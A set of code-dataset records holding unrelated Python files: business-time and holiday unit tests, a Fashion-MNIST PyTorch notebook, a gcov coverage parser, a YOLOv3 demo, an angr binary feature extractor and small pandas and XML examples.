datetime(2014, 1, 21)\n )\n )\n\n def test_iterbusinessdays(self):\n start = datetime(2014, 1, 16)\n end = datetime(2014, 1, 22)\n self.assertEqual(\n tuple(self.bt.iterbusinessdays(start, end)),\n (\n datetime(2014, 1, 16),\n datetime(2014, 1, 17),\n datetime(2014, 1, 21)\n )\n )\n\n def test_iterbusinessdays_conforms_to_business_hours(self):\n start = datetime(2014, 1, 16, 17, 1)\n end = datetime(2014, 1, 23, 2)\n self.assertEqual(\n tuple(self.bt.iterbusinessdays(start, end)),\n (\n datetime(2014, 1, 17),\n datetime(2014, 1, 21),\n datetime(2014, 1, 22)\n )\n )\n\n def test_isduringbusinessday(self):\n self.assertTrue(self.bt.isduringbusinesshours(datetime(2014, 1, 15, 12)))\n self.assertFalse(self.bt.isduringbusinesshours(datetime(2014, 1, 15)))\n self.assertFalse(self.bt.isduringbusinesshours(datetime(2014, 1, 18, 11)))\n self.assertFalse(self.bt.isduringbusinesshours(datetime(2014, 1, 20, 11, 46, 43)))\n\n def test_holidays_specified_as_list(self):\n bd = BusinessTime(holidays=[date(2014, 1, 1)])\n self.assertTrue(bd.isholiday(date(2014, 1, 1)))\n self.assertFalse(bd.isholiday(date(2014, 1, 2)))\n\n def test_businesstimedelta_after_during(self):\n start = datetime(2014, 1, 16, 18, 30)\n end = datetime(2014, 1, 22, 10, 0)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=2, hours=1)\n )\n\n def test_businesstimedelta_1_minute_after_during(self):\n \"\"\"https://github.com/seatgeek/businesstime/issues/7\"\"\"\n start = datetime(2015, 2, 23, 17, 0)\n end = datetime(2015, 2, 24, 14, 20)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(hours=5, minutes=20)\n )\n start = datetime(2015, 2, 23, 17, 1)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(hours=5, minutes=20)\n )\n\n def test_businesstimedelta_nonbusiness_after(self):\n start = datetime(2014, 1, 12, 12)\n end = datetime(2014, 1, 17, 19, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=4, hours=8)\n )\n\n def test_businesstimedelta_before_after(self):\n start = datetime(2014, 1, 13, 4)\n end = datetime(2014, 1, 17, 19, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=4, hours=8)\n )\n\n def test_businesstimedelta_during_after(self):\n start = datetime(2014, 1, 30, 12, 15)\n end = datetime(2014, 1, 31, 19, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, hours=4, minutes=45)\n )\n\n def test_businesstimedelta_during_before(self):\n start = datetime(2014, 8, 4, 11)\n end = datetime(2014, 8, 6, 5)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, hours=6)\n )\n\n def test_businesstimedelta_before_before(self):\n start = datetime(2014, 8, 4, 1)\n end = datetime(2014, 8, 4, 5)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=0)\n )\n\n def test_businesstimedelta_after_after(self):\n start = datetime(2014, 8, 4, 22)\n end = datetime(2014, 8, 4, 23)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=0)\n )\n\n def test_businesstimedelta_during_nonbusiness(self):\n start = datetime(2014, 1, 10, 16, 15)\n end = datetime(2014, 1, 12, 12, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(minutes=45)\n )\n\n def test_businesstimedelta_during_nonbusiness2(self):\n start = datetime(2014, 1, 9, 16, 15)\n end = datetime(2014, 1, 12, 12, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, minutes=45)\n )\n\n def 
test_businesstimedelta_after_nonbusiness(self):\n start = datetime(2014, 1, 10, 17, 15)\n end = datetime(2014, 1, 12, 12, 30)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta()\n )\n\n def test_businesstimedelta_during_during(self):\n start = datetime(2014, 1, 2, 9, 12)\n end = datetime(2014, 1, 3, 9, 10)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(hours=7, minutes=58)\n )\n\n def test_businesstimedelta_during_during2(self):\n start = datetime(2014, 1, 2, 9, 10)\n end = datetime(2014, 1, 3, 9, 12)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1, minutes=2)\n )\n\n def test_businesstimedelta_during_during3(self):\n start = datetime(2014, 1, 2, 9, 10)\n end = datetime(2014, 1, 2, 9, 12)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(minutes=2)\n )\n\n def test_businesstimedelta_nonbusiness_nonbusiness(self):\n start = datetime(2014, 1, 4, 9, 10)\n end = datetime(2014, 1, 4, 9, 12)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta()\n )\n\n def test_businesstimedelta_exactly_one_day(self):\n start = datetime(2014, 1, 7, 10)\n end = datetime(2014, 1, 8, 10)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1)\n )\n\n def test_businesstimedelta_exactly_one_day2(self):\n \"\"\"\n Test for https://github.com/seatgeek/businesstime/issues/3\n \"\"\"\n start = datetime(2014, 1, 7, 9)\n end = datetime(2014, 1, 8, 9)\n self.assertEqual(\n self.bt.businesstimedelta(start, end),\n timedelta(days=1)\n )\n\n\nclass USFederalHolidaysTest(unittest.TestCase):\n\n def test_2013(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2013, 1, 1), end=date(2013, 12, 31))),\n [\n date(2013, 1, 1),\n date(2013, 1, 21),\n date(2013, 2, 18),\n date(2013, 5, 27),\n date(2013, 7, 4),\n date(2013, 9, 2),\n date(2013, 10, 14),\n date(2013, 11, 11),\n date(2013, 11, 28),\n date(2013, 12, 25)\n ]\n )\n\n def test_2014(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2014, 1, 1), end=date(2014, 12, 31))),\n [\n date(2014, 1, 1),\n date(2014, 1, 20),\n date(2014, 2, 17),\n date(2014, 5, 26),\n date(2014, 7, 4),\n date(2014, 9, 1),\n date(2014, 10, 13),\n date(2014, 11, 11),\n date(2014, 11, 27),\n date(2014, 12, 25)\n ]\n )\n\n def test_2015(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2015, 1, 1), end=date(2015, 12, 31))),\n [\n date(2015, 1, 1),\n date(2015, 1, 19),\n date(2015, 2, 16),\n date(2015, 5, 25),\n date(2015, 7, 3),\n date(2015, 7, 4),\n date(2015, 9, 7),\n date(2015, 10, 12),\n date(2015, 11, 11),\n date(2015, 11, 26),\n date(2015, 12, 25)\n ]\n )\n\n def test_2016(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2016, 1, 1), end=date(2016, 12, 31))),\n [\n date(2016, 1, 1),\n date(2016, 1, 18),\n date(2016, 2, 15),\n date(2016, 5, 30),\n date(2016, 7, 4),\n date(2016, 9, 5),\n date(2016, 10, 10),\n date(2016, 11, 11),\n date(2016, 11, 24),\n date(2016, 12, 25),\n date(2016, 12, 26)\n ]\n )\n\n def test_2017(self):\n holidays_gen = USFederalHolidays()\n self.assertEqual(\n list(holidays_gen(date(2017, 1, 1), end=date(2017, 12, 31))),\n [\n date(2017, 1, 1),\n date(2017, 1, 2),\n date(2017, 1, 16),\n date(2017, 2, 20),\n date(2017, 5, 29),\n date(2017, 7, 4),\n date(2017, 9, 4),\n date(2017, 10, 9),\n date(2017, 11, 10),\n date(2017, 11, 11),\n date(2017, 11, 23),\n date(2017, 12, 25)\n ]\n 
)\n","sub_path":"businesstime/test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"22659840","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Training Deep Neural Networks with PyTorch\n\n# In[1]:\n\n\nimport torch\nimport torchvision\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.datasets import FashionMNIST\nfrom torchvision.transforms import ToTensor\nfrom torchvision.utils import make_grid\nfrom torch.utils.data.dataloader import DataLoader\nfrom torch.utils.data import random_split\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nmatplotlib.rcParams['figure.facecolor'] = '#ffffff'\n\n\n# We can download the data and create a PyTorch dataset using the `MNIST` class from `torchvision.datasets`. \n\n# In[2]:\n\n\n#Preparing the Data\ndataset = FashionMNIST(root='data/', download=True, transform=ToTensor())\ntest_dataset = FashionMNIST(root='data/', train=False, transform=ToTensor())\n\n\n# In[3]:\n\n\nimage, label = dataset[0]\nprint('image.shape:', image.shape)\nplt.imshow(image.permute(1, 2, 0), cmap='gray')\nprint('Label:', label)\nprint('Label:', dataset.classes[label])\n\n\n# In[4]:\n\n\nimage, label = dataset[5]\nprint('image.shape:', image.shape)\nplt.imshow(image.permute(1, 2, 0), cmap='gray')\nprint('Label:', label)\nprint('Label:', dataset.classes[label])\n\n\n# In[5]:\n\n\n#Using `random_split` helper function, set aside 10000 images as validation set. \nval_size = 10000\ntrain_size = len(dataset) - val_size\ntrain_ds, val_ds = random_split(dataset, [train_size, val_size])\nlen(train_ds), len(val_ds)\n\n\n# We can now create PyTorch data loaders for training and validation.\n\n# In[6]:\n\n\nbatch_size=128\n\n\n# In[7]:\n\n\ntrain_loader = DataLoader(train_ds, batch_size, shuffle=True, num_workers=4, pin_memory=True)\nval_loader = DataLoader(val_ds, batch_size*2, num_workers=4, pin_memory=True)\ntest_loader = DataLoader(test_dataset, batch_size*2, num_workers=4, pin_memory=True)\n\n\n# In[8]:\n\n\n#visualize a batch of data\nfor images, _ in train_loader:\n print('images.shape:', images.shape)\n plt.figure(figsize=(16,8))\n plt.axis('off')\n plt.imshow(make_grid(images, nrow=16).permute((1, 2, 0)))\n break #1 batch only - break\n\n\n# ## Model\n# \n# Visual representation of the model with only 1 hidden layer (but I will use 3 hidden layers in the code).\n# \n# \n# \n# \n# Let's define the model by extending the `nn.Module` class from PyTorch.\n\n# Then, use the Rectified Linear Unit (ReLU) function as the activation function for the outputs. It has the formula `relu(x) = max(0,x)` i.e. it simply replaces negative values in a given tensor with the value 0. 
ReLU is a non-linear function, as seen here visually:\n# \n# \n# \n# We can use the `F.relu` method to apply ReLU to the elements of a tensor.\n\n# In[29]:\n\n\nclass MnistModel(nn.Module):\n \"\"\"Feedfoward neural network with 3 hidden layers\"\"\"\n def __init__(self, in_size, hidden_size, out_size):\n super().__init__()\n # hidden layer\n self.linear1 = nn.Linear(in_size, 128)\n # hidden layer2\n self.linear2 = nn.Linear(128, 64)\n # hidden layer3\n self.linear3 = nn.Linear(64, 32)\n #output layer\n self.linear4 = nn.Linear(32, out_size)\n \n \n def forward(self, xb):\n # Flatten the image tensors\n xb = xb.view(xb.size(0), -1)\n # Get intermediate outputs using hidden layer\n out = self.linear1(xb)\n # Apply activation function\n out = F.relu(out)\n # Get intermediate outputs using hidden layer 2\n out = self.linear2(out)\n # Apply activation function\n out = F.relu(out)\n # Get intermediate outputs using hidden layer 3\n out = self.linear3(out)\n # Apply activation function\n out = F.relu(out)\n # Get predictions using output layer\n out = self.linear4(out)\n return out\n \n def training_step(self, batch):\n '''Returns the loss for a batch of training data'''\n images, labels = batch \n out = self(images) # Generate predictions\n loss = F.cross_entropy(out, labels) # Calculate loss\n return loss\n \n def validation_step(self, batch):\n images, labels = batch \n out = self(images) # Generate predictions\n \n loss = F.cross_entropy(out, labels) # Calculate loss\n acc = accuracy(out, labels) # Calculate accuracy\n return {'val_loss': loss, 'val_acc': acc}\n \n def validation_epoch_end(self, outputs):\n '''Takes result from the batches and averages the losses and accuracy to get overall'''\n batch_losses = [x['val_loss'] for x in outputs]\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\n batch_accs = [x['val_acc'] for x in outputs]\n epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies\n return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()}\n \n def epoch_end(self, epoch, result):\n print(\"Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}\".format(epoch, result['val_loss'], result['val_acc']))\n\n\n# In[30]:\n\n\ndef accuracy(outputs, labels):\n _, preds = torch.max(outputs, dim=1)\n return torch.tensor(torch.sum(preds == labels).item() / len(preds))\n\n\n# In[31]:\n\n\ninput_size = 784\nhidden_size = 32 \nnum_classes = 10\n\n\n# In[32]:\n\n\nmodel = MnistModel(input_size, hidden_size=hidden_size, out_size=num_classes)\n\n\n# In[34]:\n\n\nfor images, labels in train_loader:\n outputs = model(images)\n loss = F.cross_entropy(outputs, labels)\n print('Loss:', loss.item())\n break\n\nprint('outputs.shape : ', outputs.shape)\nprint('Sample outputs :\\n', outputs[:2].data)\n\n\n# ## Training the Model\n\n# In[41]:\n\n\ndef evaluate(model, val_loader):\n \"\"\"Evaluate the model's performance on the validation set\"\"\"\n outputs = [model.validation_step(batch) for batch in val_loader]\n return model.validation_epoch_end(outputs)\n\ndef fit(epochs, lr, model, train_loader, val_loader, opt_func=torch.optim.SGD):\n \"\"\"Train the model using gradient descent\"\"\"\n history = []\n optimizer = opt_func(model.parameters(), lr)\n for epoch in range(epochs):\n # Training Phase \n for batch in train_loader:\n loss = model.training_step(batch) \n loss.backward() \n optimizer.step()\n optimizer.zero_grad()\n # Validation phase\n result = evaluate(model, val_loader) \n model.epoch_end(epoch, result)\n history.append(result)\n return history\n\n\n# 
In[42]:\n\n\nmodel = MnistModel(input_size, hidden_size=hidden_size, out_size=num_classes)\n\n\n# In[43]:\n\n\nhistory = [evaluate(model, val_loader)]\nhistory\n\n\n# In[44]:\n\n\nhistory += fit(5, 0.5, model, train_loader, val_loader)\n\n\n# In[45]:\n\n\nhistory += fit(5, 0.1, model, train_loader, val_loader)\n\n\n# In[46]:\n\n\nhistory += fit(10, 0.05, model, train_loader, val_loader)\n\n\n# In[47]:\n\n\nhistory += fit(20, 0.1, model, train_loader, val_loader)\n\n\n# In[48]:\n\n\nhistory += fit(50, 0.01, model, train_loader, val_loader)\n\n\n# In[49]:\n\n\n# history += fit(30, 0.1, model, train_loader, val_loader)\n\n\n# In[50]:\n\n\n# history += fit(30, 0.001, model, train_loader, val_loader)\n\n\n# In[51]:\n\n\nlosses = [x['val_loss'] for x in history]\nplt.plot(losses, '-x')\nplt.xlabel('epoch')\nplt.ylabel('loss')\nplt.title('Loss vs. No. of epochs');\n\n\n# In[52]:\n\n\naccuracies = [x['val_acc'] for x in history]\nplt.plot(accuracies, '-x')\nplt.xlabel('epoch')\nplt.ylabel('accuracy')\nplt.title('Accuracy vs. No. of epochs');\n\n\n# ## Testing with individual images\n\n# In[53]:\n\n\n# Define test dataset\ntest_dataset = FashionMNIST(root='data/', \n train=False,\n transform=ToTensor())\n\n\n# Define a helper function `predict_image`, which returns the predicted label for a single image tensor.\n\n# In[54]:\n\n\ndef predict_image(img, model):\n yb = model(img)\n _, preds = torch.max(yb, dim=1)\n return preds[0].item()\n\n\n# In[55]:\n\n\nimg, label = test_dataset[5]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[56]:\n\n\nimg, label = test_dataset[1839]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[57]:\n\n\nimg, label = test_dataset[193]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[58]:\n\n\nimg, label = test_dataset[9999]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[59]:\n\n\nimg, label = test_dataset[67]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[60]:\n\n\nimg, label = test_dataset[48]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n","sub_path":"FASHION_MNIST_FFNN.py","file_name":"FASHION_MNIST_FFNN.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613368740","text":"# -*- coding: utf-8 -*-\nimport glob, os\nfrom bs4 import BeautifulSoup\nimport collections\nfrom tqdm import tqdm\nfrom os import walk\n\n\ntopList = []\n\nclass nodeScore(object):\n \"\"\"docstring for nodeScore.\"\"\"\n def __init__(self, name, numbLine, lineNum, code=None):\n super(nodeScore, self).__init__()\n tmpName = name.replace(\"example-html-details.\", \"\")\n tmpName = tmpName.replace(\".html\", \"\")\n 
tmpNameList = tmpName.split(\"_\",1)\n        name = tmpNameList[0]+\"/\"+tmpNameList[1]\n        self.name = name\n        self.lineNum = int(lineNum)\n        self.numbLine = int(numbLine)\n        self.code = code\n\n    def __hash__(self):\n        return hash(('title', self.name,\n                     'lineNum', self.lineNum,\n                     'numberLine', self.numbLine))\n\n    def __str__(self):\n        return (\"\\nName of File \" + str(self.name) + \"\\nLine Number: \" +str( self.lineNum) +\"\\nNumber of Line Executed: \"+ str( self.numbLine) + \"\\nCode : \" + str(self.code))\n\n    def print_auto(self):\n        return (str(self.name) + \" \" + str(self.lineNum) + \" \" + str(self.numbLine) + \" \" + str(self.code))\n\n    def __val__(self):\n        return self.name, self.lineNum, self.numbLine\n\n    def __get_numbLine(self):\n        return int(self.numbLine)\n\n\n\n#get_files function returns relative paths of html files that are generated by gcovr\ndef get_files():\n    fileP = []\n    for (dirpath, dirnames, filenames) in walk(\"./\"):\n        fileP.extend(filenames)\n        break\n    print(\"Number of gcov files are \" + str(len(fileP)))\n    return fileP\n\n#Analyze data from a file\ndef analyze_file(file, c_list, emptyList): #file is a path, c_list collects nodeScore objects and emptyList collects files that have no covered line\n    soup = BeautifulSoup(open(file), features=\"lxml\")\n    myTr = soup.findAll(\"tr\")\n    coveredLine = []\n    for tr in myTr:\n        if tr.find(\"td\", {\"class\":\"linecount coveredLine\"}) is not None and tr.find(\"td\", {\"class\": \"src coveredLine\"}) is not None:\n            coveredLine.append(tr)\n\n    # class object list \n    if not coveredLine:\n        emptyList.append(os.path.basename(file))\n        return c_list,emptyList\n    else:\n        for line in coveredLine:\n            if \"for (\" in str(line.find(\"td\", {\"class\": \"src coveredLine\"})):\n                c_list.append(nodeScore(file, int(line.find(\"td\", {\"class\": \"linecount coveredLine\"}).string), int(line.find(\"td\", {\"class\": \"lineno\"}).string), str(line.find(\"td\", {\"class\": \"src coveredLine\"}).string).strip()))\n        return c_list, emptyList\n\n#Function that writes data to a file\ndef write_2_file(tempList):\n    with open(\"/home/parallels/Desktop/ffmpeg_source/output_original_gcov.txt\", \"w\") as f:\n        for val in tempList:\n            if \"aac\" in val.name:\n                continue\n            else:\n                f.write(str(val.print_auto())+\"\\n\")\n\n\nif __name__ == \"__main__\":\n    TEST = False\n    if TEST == True:\n        print(\"Testing\")\n    else:\n        fileP = get_files()\n\n        # print(os.path.basename(\"./libavutil/libavutil-html-details.buffer.c.html\")\n        emptyList = []\n        random = 0\n        c_list = []\n\n        for file in tqdm(fileP):\n            c_list, emptyList = analyze_file(file, c_list, emptyList)\n\n        c_list.sort(key=lambda e: int(e.numbLine), reverse=True)\n        # c_list.sort(key=lambda e: e.numbLine, reverse=True)\n        #Printing it to file\n        write_2_file(c_list)\n\n#ffmpeg -i ~/Desktop/Parallels\\ Shared\\ Folders/Home/Desktop/y2mate.com\\ -\\ hearts_colors_lion_fzcQxRr1cSw_1080p.mp4 -vcodec copy -acodec copy ./filename.avi","sub_path":"gcov_analysis.py","file_name":"gcov_analysis.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501094082","text":"from xml.dom import minidom\n\ndoc = minidom.parse('bookstore.xml')\n# doc.documentElement方式找到第一个标签(通常情况下)\nroot = doc.documentElement\nprint(type(root), root.nodeName)\n# 可以使用dir看root有哪些方法可以用\n# print(dir(root))\nbooks = root.getElementsByTagName('book')\nfor book in books:\n    titles = book.getElementsByTagName('title')\n    prices = book.getElementsByTagName('price')\n    # 
由于title和price都只有一个SubNode也就是标签中值\n # 并且每个book也只有一个title和price\n # 内容节点的变量类型都是str\n print(titles[0].childNodes[0].nodeValue, prices[0].childNodes[0].nodeValue)\n# 输出\n# bookstore\n# Harry Potter 29.99\n# Learn XML 75","sub_path":"elem/xml_dom.py","file_name":"xml_dom.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444198897","text":"#! /usr/bin/env python\n# coding=utf-8\n# ================================================================\n# Copyright (C) 2019 * Ltd. All rights reserved.\n#\n# Editor : VIM\n# File name : image_demo.py\n# Author : YunYang1994\n# Created date: 2019-07-12 13:07:27\n# Description :\n#\n# ================================================================\n\nimport cv2\nimport time\nimport os\nimport numpy as np\nimport core.utils as utils\nimport tensorflow as tf\nfrom core.yolov3 import YOLOv3, decode\nfrom PIL import Image\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\ninput_size = 416\nimage_path = \"./docs/kite.jpg\"\n\ninput_layer = tf.keras.layers.Input([input_size, input_size, 3])\nfeature_maps = YOLOv3(input_layer)\n\noriginal_image = cv2.imread(image_path)\noriginal_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)\noriginal_image_size = original_image.shape[:2]\n\nimage_data, old_image_size, new_image_size = utils.image_preprocess(np.copy(original_image), [input_size, input_size])\nimage_data = image_data[np.newaxis, ...].astype(np.float32)\n\nimage_data = np.tile(image_data, [1, 1, 1, 1])\n\nbbox_tensors = []\nfor i, fm in enumerate(feature_maps):\n bbox_tensor = decode(fm, i)\n bbox_tensors.append(bbox_tensor)\n\nmodel = tf.keras.Model(input_layer, bbox_tensors)\nutils.load_weights(model, \"yolov3.weights\")\n# model.summary()\n\npred_bbox = model.predict(image_data)\n# pred_bbox = model.predict_on_batch(image_data)\npred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]\npred_bbox = tf.concat(pred_bbox, axis=0)\nbboxes = utils.postprocess_boxes(pred_bbox, old_image_size, new_image_size, 0.3)\nbboxes = utils.nms(bboxes, 0.45, method='nms')\n\nimage = utils.draw_bbox(original_image, bboxes)\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n# cv2.imwrite(\"./kite_pred.jpg\", image)\n\ncv2.imshow(\"predicted image\", image)\n# Load and hold the image\ncv2.waitKey(0)\n# To close the window press any key\ncv2.destroyAllWindows()\n","sub_path":"YOLOv3/image_demo.py","file_name":"image_demo.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238994501","text":"#!/home/xianglin/.virtualenvs/angr/bin/ python\n# -*- coding: utf-8 -*-\n__Auther__ = 'xianglin'\n\nimport angr\nimport capstone\nimport claripy\nimport numpy as np\nfrom tools.image import Image\nfrom tools.util.asm import is_jump\n\n\"\"\"\nit is based on ARM64 instruction set, might add more CPU arch in the future\n\"\"\"\n######################################################################\n# numeric feature\n######################################################################\ndef get_consts(img, insn, offset):\n \"\"\"\n get const from an instruction\n if op is in call function, pass\n else: if it is an imm, check if it is an addr or numeric\n else [mem]\n\n Args:\n insn:(capstone.insn) an instuction\n offset(int): the i-th operand\n\n Returns:\n string_consts(list):\n numeric_consts(list):\n \"\"\"\n string_consts = []\n numeric_consts = []\n insn = insn.insn\n arm64_CI = 
{'b', 'bl', 'cbz', 'cbnz', 'tbz', 'tbnz'}\n op_imm = {'ARM_OP_IMM', 'ARM64_OP_IMM', 'X86_OP_IMM', 'MIPS_OP_IMM'}\n op_mnemonic = insn.mnemonic\n # if mnemonic is in call functions, return\n if check_type(op_mnemonic, arm64_CI):\n return string_consts, numeric_consts\n\n base_pointer = {'pc'}\n operand = insn.operands[offset]\n op_type = operand.type\n # if it is an immediate value, output the value\n # contingent across all arch\n if op_type == capstone.arm64.ARM64_OP_IMM:\n # if adr, then string/numeric?, else numeric\n if check_type(op_mnemonic, {'adr'}):\n # turn int to addr hex\n bvv = claripy.BVV(operand.value.imm, 64)\n addr = bvv.args[0]\n string_const = get_string(img, addr)\n if string_const is None:\n numeric_const = get_numeric(img, addr)\n numeric_consts.append(numeric_const)\n else:\n string_consts.append(string_const)\n else:\n numeric_consts.append(operand.value.imm)\n # [mem]\n elif op_type == capstone.arm64.ARM64_OP_MEM:\n if operand.value.mem.base != 0:\n base_reg = insn.reg_name(operand.value.mem.base)\n if base_reg in base_pointer:\n disp = operand.value.mem.disp\n addr = insn.address + disp\n numeric_const = get_numeric(img, addr)\n numeric_consts.append(numeric_const)\n\n return string_consts, numeric_consts\n\n\ndef get_BB_consts(img, block):\n \"\"\"\n get string and numeric consts from a block\n Args:\n img(tools.image.Image)\n block: angr.block\n\n Returns:\n string_consts(list): string consts from a block\n numeric_consts(list): numeric consts from a block\n\n \"\"\"\n string_consts = []\n numeric_consts = []\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n num_operands = len(insn.operands)\n for offset in range(num_operands):\n strings, numerics = get_consts(img, insn, offset)\n string_consts += strings\n numeric_consts += numerics\n\n return string_consts, numeric_consts\n\n\ndef cal_insts(block):\n \"\"\"calculate the number of instructions in a block\"\"\"\n return block.instructions\n\n\ndef cal_transfer_insts(block):\n arm_TI = {'mvn', \"mov\"}\n num = 0\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n op_type = insn.insn.mnemonic\n if check_type(op_type, arm_TI):\n num = num + 1\n return num\n\n\ndef cal_call_insts(block):\n arm64_CI = {'b', 'bl', 'cbz', 'cbnz', 'tbz', 'tbnz'}\n num = 0\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n op_type = insn.insn.mnemonic\n if check_type(op_type, arm64_CI):\n num = num + 1\n return num\n\n\ndef cal_arithmetic_insts(block):\n arm64_AI = {'add', 'sub', 'adc', 'sbc'}\n num = 0\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n op_type = insn.insn.mnemonic\n if check_type(op_type, arm64_AI):\n num = num + 1\n return num\n\n\ndef get_BB_features(img, block):\n \"\"\"get block attributes, without offspring\"\"\"\n fea = []\n strings, consts = get_BB_consts(img, block)\n # 1 strings const\n fea.append(len(strings))\n # 2 numeric const\n fea.append(len(consts))\n # 3 transfer inst\n tran = cal_transfer_insts(block)\n fea.append(tran)\n # 4 calls\n calls = cal_call_insts(block)\n fea.append(calls)\n # 5 inst\n insts = cal_insts(block)\n fea.append(insts)\n # 6 arithmetic\n arti = cal_arithmetic_insts(block)\n fea.append(arti)\n # 7 offspring\n\n return fea\n\n\ndef get_func_fea(bin, func_name):\n \n node_num = 0\n\n img = Image(bin)\n\n entry_base = img.get_symbol_addr(func_name)\n if not entry_base:\n return\n func_cfg = img.get_cfg(func_name)\n func_cfg.normalize()\n all_nodes = []\n for n in func_cfg.nodes():\n if n.function_address == entry_base:\n 
all_nodes.append(n)\n node_num = node_num + 1\n all_nodes.sort(key=lambda CFGNodeA: CFGNodeA.addr)\n\n X_input = np.zeros((node_num, 7))\n node_mask = np.zeros((node_num, node_num))\n\n for u in range(len(all_nodes)):\n fea = get_BB_features(img, all_nodes[u].block)\n offs = 0\n for succ in all_nodes[u].successors:\n if succ.function_address == entry_base:\n offs += 1\n succ_index = all_nodes.index(succ)\n node_mask[u, succ_index] = 1\n fea.append(offs)\n X_input[u, :] = np.array(fea)\n\n return X_input, node_mask\n\n\n######################################################################\n# other functions\n######################################################################\ndef check_type(t, t_set):\n \"\"\"\n Args:\n t(str): operator or register\n t_set(set): check type set\n\n Returns:\n states(boolean): true if t is in t_set\n\n \"\"\"\n for t_type in t_set:\n if t.startswith(t_type):\n return True\n return False\n\n\ndef get_string(img, addr):\n string = \"\"\n for i in range(1000):\n c = img.project.loader.memory.load(addr + i, 1)\n if ord(c) == 0:\n break\n elif 40 <= ord(c) < 128:\n string += chr(ord(c))\n else:\n return None\n return string\n\n\ndef get_numeric(img, addr):\n b = img.project.loader.memory.load(addr, 4)\n num = int.from_bytes(b, \"little\")\n return num\n\n\nif __name__ == \"__main__\":\n bin = \"/home/xianglin/PycharmProjects/genius/testcase/2423496af35d94a87156b063ea5cedffc10a70a1/vmlinux\"\n func_name = \"dccp_rcv_state_process\"\n i, j = get_func_fea(bin, func_name)\n","sub_path":"NumericFeatureExtractor.py","file_name":"NumericFeatureExtractor.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424776291","text":"# %load q05_create_bowler_filter/build.py\n# Default imports\nfrom greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df\n\n# You have been given dataset already in 'ipl_df'.\nipl_df = read_csv_data_to_df(\"./data/ipl_dataset.csv\")\n\n# Solution\n\ndef create_bowler_filter(bowler):\n bowler_Series=ipl_df['bowler']\n bowler_filter =bowler_Series==bowler\n #bowler_Series_filter=bowler_Series[bowler_filter]\n #print(type(bowler_filter))\n 